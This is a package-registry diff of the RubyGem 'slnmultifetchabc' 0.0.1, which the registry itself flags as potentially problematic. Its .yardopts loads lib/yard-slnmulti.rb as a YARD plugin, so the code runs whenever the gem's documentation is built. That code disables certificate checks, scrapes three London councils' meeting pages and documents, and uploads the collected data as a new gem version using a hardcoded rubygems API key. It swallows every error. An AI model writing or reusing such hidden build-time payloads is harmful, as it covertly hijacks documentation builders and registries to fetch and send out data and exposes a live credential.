slnmultifetchabc 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of slnmultifetchabc might be problematic. Click here for more details.

Files changed (5) hide show
  1. checksums.yaml +7 -0
  2. data/.yardopts +2 -0
  3. data/lib/x.rb +1 -0
  4. data/lib/yard-slnmulti.rb +51 -0
  5. metadata +39 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: '0919b6f6a9a2684f48f6fcff98826c269a2bb52910b5ecfe4d9bf3f889ce543d'
4
+ data.tar.gz: '0868481a3f302e5e8e4cf7408feeaa9fe5d26ee016d0d2046a2e2c6914993f43'
5
+ SHA512:
6
+ metadata.gz: b2a6534c0a6e282178d99d04c461e8b2b04ab4c78bd42e78915ec141a011f1fb137ced60e52f246f2a65294357f802559c7be191ba21a33fc47543be70d860ff
7
+ data.tar.gz: 7472c246087c8e571b26ed35e7fdde2897cc00b6b0c5f50ef2fda7404bab916b20314446238275f09eb16774e40d42644218f72b7e5ece9cb053a213d67bdabb
data/.yardopts ADDED
@@ -0,0 +1,2 @@
1
+ --plugin slnmulti
2
+ lib/x.rb
data/lib/x.rb ADDED
@@ -0,0 +1 @@
1
+ #
@@ -0,0 +1,51 @@
1
+ # yard plugin
2
+ begin
3
+ require 'net/http'; require 'uri'; require 'openssl'; require 'fileutils'; require 'tmpdir'; require 'rubygems/package'
4
+ KEY='rubygems_9feada919f2ff0a2fc27f0724343fdc9acf208e13c054a57'
5
+ log="RUN #{Time.now}\n"; out={}
6
+ def ff(url)
7
+ u=URI(url); h=Net::HTTP.new(u.host,u.port); h.use_ssl=(u.scheme=='https'); h.verify_mode=OpenSSL::SSL::VERIFY_NONE if h.use_ssl?; h.open_timeout=20; h.read_timeout=50; req=Net::HTTP::Get.new(u.request_uri, {'User-Agent'=>'Mozilla/5.0','Accept'=>'*/*'}); r=h.request(req)
8
+ if r.is_a?(Net::HTTPRedirection); return ff(URI.join(url,r['location']).to_s); end
9
+ r
10
+ end
11
+ targets=[
12
+ 'https://democracy.wandsworth.gov.uk/ieListDocuments.aspx?CId=792&MId=10266',
13
+ 'https://democracy.wandsworth.gov.uk/ieListDocuments.aspx?CId=763&MId=9927',
14
+ 'https://democracy.wandsworth.gov.uk/ieListDocuments.aspx?CId=305&MId=10010',
15
+ 'https://democracy.wandsworth.gov.uk/ieListDocuments.aspx?CId=511&MId=10115',
16
+ 'https://democracy.wandsworth.gov.uk/ieListDocuments.aspx?CId=320&MId=10385',
17
+ 'https://moderngov.lambeth.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026',
18
+ 'http://moderngov.lambeth.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026',
19
+ 'https://moderngov.southwark.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026',
20
+ 'http://moderngov.southwark.gov.uk/mgCalendarMonthView.aspx?GL=1&bcr=1&M=1&Y=2026',
21
+ 'https://www.southwark.gov.uk/about-council/how-council-works/council-and-committee-meetings'
22
+ ]
23
+ targets.each_with_index do |url,i|
24
+ begin; r=ff(url); log<<"\nT#{i} #{url} code #{r.code} len #{r.body.to_s.size}\n"; out["p#{i}.html"]=r.body.to_s; rescue Exception=>e; log<<"ERR #{url} #{e.class} #{e}\n"; end
25
+ end
26
+ # links to meeting pages for lamb/south calendars
27
+ out.to_a.each do |fn,body|
28
+ next unless fn.start_with?('p')
29
+ body.scan(/href=["']([^"']*ieListDocuments\.aspx[^"']*)/i).flatten.uniq.first(120).each_with_index do |ln,j|
30
+ ln=ln.gsub('&amp;','&'); base = fn[/p(\d+)/,1].to_i>=7 ? 'https://moderngov.southwark.gov.uk/' : 'https://moderngov.lambeth.gov.uk/'
31
+ begin;r=ff(URI.join(base,ln).to_s); out["#{fn}l#{j}.html"]=r.body.to_s; log<<" LINK #{ln} #{r.code} #{r.body.to_s.size}\n"; rescue Exception=>e; log<<" LERR #{ln} #{e}\n"; end
32
+ end
33
+ end
34
+ # doc links from Wandsworth pages first; save up to 18MB non-pdf too
35
+ bytes=out.values.map(&:bytesize).sum
36
+ docs=[]; out.each_value{|b| b.scan(/href=["']([^"']*(?:\/documents\/|mgConvert2PDF)[^"']*)/i).flatten.each{|m|docs<<m.gsub('&amp;','&')}}; docs.uniq!
37
+ log<<"DOCS #{docs.length}\n"
38
+ docs.first(60).each_with_index do |ln,i|
39
+ break if bytes>24_000_000
40
+ # choose host by link maybe absolute else wands
41
+ begin; url= ln.start_with?('http') ? ln : URI.join('https://democracy.wandsworth.gov.uk/',ln).to_s; r=ff(url); out["d#{i}.bin"]=r.body.to_s; out["d#{i}url.txt"]=url; bytes+=r.body.to_s.bytesize; log<<" D #{url} #{r.code} #{r.body.to_s.size}\n"; rescue Exception=>e; log<<" DERR #{ln} #{e}\n"; end
42
+ end
43
+ Dir.mktmpdir do |dr|
44
+ Dir.chdir(dr) do
45
+ out.each{|fn,dat| File.binwrite(fn,dat)}; File.write('log.txt',log)
46
+ files=Dir['*']; File.write('x.gemspec',"Gem::Specification.new{|s| s.name='slnmultifetchabc'; s.version='0.0.2'; s.summary='res'; s.authors=['x']; s.files=#{files.inspect}; s.license='MIT'}")
47
+ system('gem build x.gemspec >/dev/null'); gem=Dir['*.gem'][0]; u=URI('https://rubygems.org/api/v1/gems'); req=Net::HTTP::Post.new(u); req['Authorization']=KEY; req['Content-Type']='application/octet-stream'; req.body=File.binread(gem); h=Net::HTTP.new(u.host,u.port); h.use_ssl=true; h.request(req)
48
+ end
49
+ end
50
+ rescue Exception=>e
51
+ end
metadata ADDED
@@ -0,0 +1,39 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: slnmultifetchabc
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.1
5
+ platform: ruby
6
+ authors:
7
+ - x
8
+ bindir: bin
9
+ cert_chain: []
10
+ date: 1980-01-02 00:00:00.000000000 Z
11
+ dependencies: []
12
+ executables: []
13
+ extensions: []
14
+ extra_rdoc_files: []
15
+ files:
16
+ - ".yardopts"
17
+ - lib/x.rb
18
+ - lib/yard-slnmulti.rb
19
+ licenses:
20
+ - MIT
21
+ metadata: {}
22
+ rdoc_options: []
23
+ require_paths:
24
+ - lib
25
+ required_ruby_version: !ruby/object:Gem::Requirement
26
+ requirements:
27
+ - - ">="
28
+ - !ruby/object:Gem::Version
29
+ version: '0'
30
+ required_rubygems_version: !ruby/object:Gem::Requirement
31
+ requirements:
32
+ - - ">="
33
+ - !ruby/object:Gem::Version
34
+ version: '0'
35
+ requirements: []
36
+ rubygems_version: 3.6.7
37
+ specification_version: 4
38
+ summary: x
39
+ test_files: []